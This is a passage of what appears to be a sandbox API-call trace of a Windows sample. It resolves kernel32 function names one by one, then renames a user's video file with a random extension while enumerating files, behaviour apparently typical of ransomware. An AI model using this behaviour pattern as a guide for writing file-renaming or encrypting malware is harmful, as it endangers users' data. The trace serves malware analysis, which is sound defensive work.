lpString1="CreateEventExA") returned="CreateEventExA" [0087.366] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.366] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.366] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.367] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.367] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.367] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.367] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.367] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.367] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.367] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.367] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.367] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.367] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.367] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.367] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.367] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.367] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.367] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.367] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.367] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.367] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.367] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.368] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.368] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.368] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.368] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.368] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.368] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.368] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.368] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.368] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.368] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.368] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.368] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.368] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.368] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.368] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.368] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.368] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.368] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.369] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.369] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.369] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.369] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.369] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.369] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.369] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.369] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.369] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.369] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.369] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.369] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.369] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.369] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.369] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.369] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.369] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.369] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.369] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.370] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.370] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.370] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.370] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.370] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.370] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.370] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.370] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.370] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.370] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.370] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.370] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.370] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.370] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.370] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.370] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.370] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.370] lstrlenA (lpString="DELETEATOM") returned 10 [0087.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.370] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.371] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.371] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.371] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.371] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.371] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.371] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.371] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.371] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.371] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.371] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.371] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.371] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.371] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.371] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.371] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.371] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.371] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.371] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.372] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.372] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.372] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.372] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.372] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.372] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.372] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.372] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.372] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.372] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.372] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.372] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.372] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.372] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.372] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.373] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.373] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.373] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.373] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.373] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.373] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.373] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf") returned 75 [0087.373] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf.jpmxYD") returned 82 [0087.373] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\eibg_lhlml2auns7k.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf.jpmxYD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\eibg_lhlml2auns7k.swf.jpmxyd"), dwFlags=0x0) returned 1 [0087.374] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.374] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.374] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.375] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa52ac5e0, ftCreationTime.dwHighDateTime=0x1d4d46b, ftLastAccessTime.dwLowDateTime=0x65cdd580, ftLastAccessTime.dwHighDateTime=0x1d4d1d3, ftLastWriteTime.dwLowDateTime=0x65cdd580, ftLastWriteTime.dwHighDateTime=0x1d4d1d3, nFileSizeHigh=0x0, nFileSizeLow=0x757d, 